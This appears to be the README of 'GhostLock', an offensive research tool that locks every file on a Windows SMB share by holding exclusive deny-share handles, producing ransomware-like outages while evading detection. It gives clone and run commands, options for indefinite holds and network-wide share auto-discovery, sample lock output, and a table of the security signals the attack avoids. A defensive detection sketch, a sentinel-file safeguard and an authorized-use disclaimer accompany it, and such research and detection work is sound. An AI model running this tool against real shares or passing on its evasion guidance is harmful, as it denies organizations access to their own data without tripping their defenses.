SMB Deny-Share Handle Availability Research Tool
Ransomware-grade availability impact. Zero writes. Zero encryption. Zero traces in your SIEM.
GhostLock demonstrates that a low-privileged Windows domain user with standard read access to an SMB share can produce ransomware-equivalent organizational availability impact with zero writes, zero encryption, and zero signals in every behavioral defense the modern enterprise security stack deploys.
By calling CreateFileW with dwShareMode = 0x00000000, the caller acquires an exclusive deny-share handle. Every other client attempting to open that file receives STATUS_SHARING_VIOLATION (0xC0000043). Applied across an entire share with 32 parallel threads, GhostLock locks hundreds of thousands of files in minutes.
No CVE. No patch. No vulnerability. This is correct, documented Windows API behavior that has existed since Windows NT 3.1.
| Detection Signal | Encryption Ransomware | GhostLock |
|---|---|---|
| Bulk write I/O | Detectable | None |
| File rename / new extension | Detectable | None |
| Honey file triggered | Write to canary | Read-open only |
| Behavioral AI (write rate) | Fires | No writes |
| EDR on endpoint | Shellcode / injection | Looks like file indexer |
| DLP / content inspection | Bulk read anomaly | Indistinguishable from backup |
| Network traffic anomaly | Bulk SMB writes | Identical to Word opening a doc |
| Storage session open-file count | Not relevant | Only reliable signal |
The only observable that identifies this attack lives inside the NAS session table — a metric virtually no enterprise SIEM currently ingests.
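A defender-side sketch of alerting on that signal, added here as an example and not part of GhostLock: it polls open-file listings from the file server and flags any session that holds an unusually large number of files open across consecutive polls. The CSV column names, the thresholds, and the sample data are assumptions constructed for illustration.

```python
import csv
import io
from collections import Counter

def make_snapshot(sessions):
    """Build a constructed open-file snapshot (CSV) from {(user, client): n_files}."""
    lines = ["ClientUserName,ClientComputerName,Path"]
    for (user, client), n in sessions.items():
        lines += [f"{user},{client},D:\\share\\dept\\f{i}.docx" for i in range(n)]
    return "\n".join(lines)

def open_counts(snapshot_csv):
    """Open-file count per (user, client) in one snapshot of the session table."""
    rows = csv.DictReader(io.StringIO(snapshot_csv))
    return Counter((r["ClientUserName"], r["ClientComputerName"]) for r in rows)

def flag_sustained_holders(snapshots, min_files=200, min_consecutive=2):
    """Flag sessions holding >= min_files open files in consecutive snapshots."""
    streak, peak, flagged = Counter(), Counter(), {}
    for snap in snapshots:
        counts = open_counts(snap)
        for key in list(streak):
            if counts.get(key, 0) < min_files:  # burst ended: reset the streak
                del streak[key], peak[key]
        for key, n in counts.items():
            if n >= min_files:
                streak[key] += 1
                peak[key] = max(peak[key], n)
                if streak[key] >= min_consecutive:
                    flagged[key] = peak[key]
    return sorted(flagged.items())

# Constructed sample: three polls of the open-file table, a few minutes apart.
SAMPLE = [
    make_snapshot({("CORP\\alice", "WS-101"): 3, ("CORP\\jdoe", "WS-114"): 4}),
    make_snapshot({("CORP\\alice", "WS-101"): 5, ("CORP\\jdoe", "WS-114"): 480}),
    make_snapshot({("CORP\\alice", "WS-101"): 2, ("CORP\\jdoe", "WS-114"): 480,
                   ("CORP\\indexer", "SRV-IDX"): 350}),
]

if __name__ == "__main__":
    for (user, client), n in flag_sustained_holders(SAMPLE):
        print(f"ALERT {user} from {client}: {n} files held open across polls")
```

The thresholds need a baseline per share, since indexers and backup agents also open many files briefly; the consecutive-poll requirement is what separates a short burst from handles that are being held.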
1. Run ghostlock.py — interactive menu appears
2. Choose: paste a UNC path, or auto-discover shares on the network
3. Tool discovers files recursively using 32-thread parallel os.scandir()
4. For each file: CreateFileW(dwShareMode=0) acquires exclusive handle
5. Holds all handles indefinitely — other clients get STATUS_SHARING_VIOLATION
6. Ctrl+C releases all handles cleanly and writes a JSON + Markdown report
- Windows 10 / Server 2016 or later
- Python 3.9+
- Domain user account with read access to the target share
- A sentinel file in the target directory (see Safety)
No third-party packages. Pure Python stdlib.
```
git clone https://github.com/kimd155/ghostlock.git
cd ghostlock
```

No pip install. No dependencies.
```
python ghostlock.py
```

```
___ _ _ ___ ___ ____ __ ___ ___ _ _
/ __)( )( )/ __)/ __)(_ _)( ) / __)( ,)( )/ )
( (_-. )__( \__ \__ \ )( )(__( (__ ) \ ) (
\___/(____)(____(____/ (__) (____)\___)(__)/ (_)\_)
usage: ghostlock.py [path] [options]
options:
  --hold-indefinite         hold locks until Ctrl+C
  --hold-seconds N          hold for N seconds
  --locks N                 max files to lock
  --existing-folder         lock existing files
  --confirm-existing-lock   required with --existing-folder
  --recursive               recurse into subdirectories
  --targets-file FILE       JSON targets file
  --victims N               victim simulation workers
run without arguments for interactive menu
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Select mode:
[1] Manual path — paste a UNC path and lock it
[2] Auto-discover — find shared folders on the network, pick which to lock
[q] Quit
```
Option 1 — paste a UNC path, tool discovers files and locks them:
```
[?] Target UNC path : \\fileserver\share\dept
[+] Sentinel found. Discovering files ...
[*] Scanning ... 4,821 files found (12 dirs pending)
[+] 4,821 files discovered in 8.3s
[?] Lock all 4,821 files indefinitely? [y/N] : y
[+] 4,819 handles acquired (2 skipped)
[~] Holding ... 47s | 4,819 files locked
```
Option 2 — auto-discovers SMB shares on the network, pick multiple to lock:
```
[*] Scanning visible SMB shares on the network ...
[OK] \\server\finance 12 files visible
[OK] \\server\projects 84 files visible
[NO] \\server\admin (inaccessible)
Select : 1,2 (or 'all')
```
```powershell
# Indefinite hold, all files, recursive
python ghostlock.py "\\server\share\path" `
    --existing-folder `
    --confirm-existing-lock `
    --hold-indefinite

# Timed hold with victim simulation
python ghostlock.py "\\server\share\path" `
    --existing-folder `
    --confirm-existing-lock `
    --locks 256 `
    --hold-seconds 120 `
    --victims 16
```

| Argument | Default | Description |
|---|---|---|
| `share_path` | (interactive) | UNC or mapped path |
| `--locks` | 64 | Max files to lock |
| `--hold-seconds` | 60 | Duration (ignored with `--hold-indefinite`) |
| `--hold-indefinite` | off | Hold until Ctrl+C |
| `--victims` | 16 | Blocking simulation workers |
| `--rounds` | 20 | Operations per victim worker |
| `--existing-folder` | off | Lock files that already exist |
| `--confirm-existing-lock` | off | Required with `--existing-folder` |
| `--recursive` | off | Discover files recursively |
| `--targets-file` | — | JSON targets file for multi-target runs |
A sentinel file must exist in any target directory before GhostLock will acquire handles against existing files:
```powershell
New-Item -ItemType File "\\server\share\targetfolder\.ghostlock_authorized"
```

GhostLock refuses to run without it. In generated-files mode (without `--existing-folder`), the tool creates its own test files and never touches existing data.
```
GhostLock_PoC_report_YYYYMMDD_HHMMSS/
    lock_impact_result.json
    lock_impact_result.md
    ghostlock_cache.json   <- re-use for instant re-lock on reconnect
```
"GhostLock: SMB Deny-Share Handles as a Zero-Privilege Availability Weapon" Kim Dvash, May 2026
Read the full paper: zenodo.org/records/20070064
Research site: ghostlock.io
THIS TOOL IS FOR AUTHORIZED SECURITY TESTING AND RESEARCH ONLY.
Running GhostLock against any system or network without explicit
written authorization from the system owner is illegal and unethical.
MIT — see LICENSE
Kim Dvash · linkedin.com/in/kim-d-5b3114111 · ghostlock.io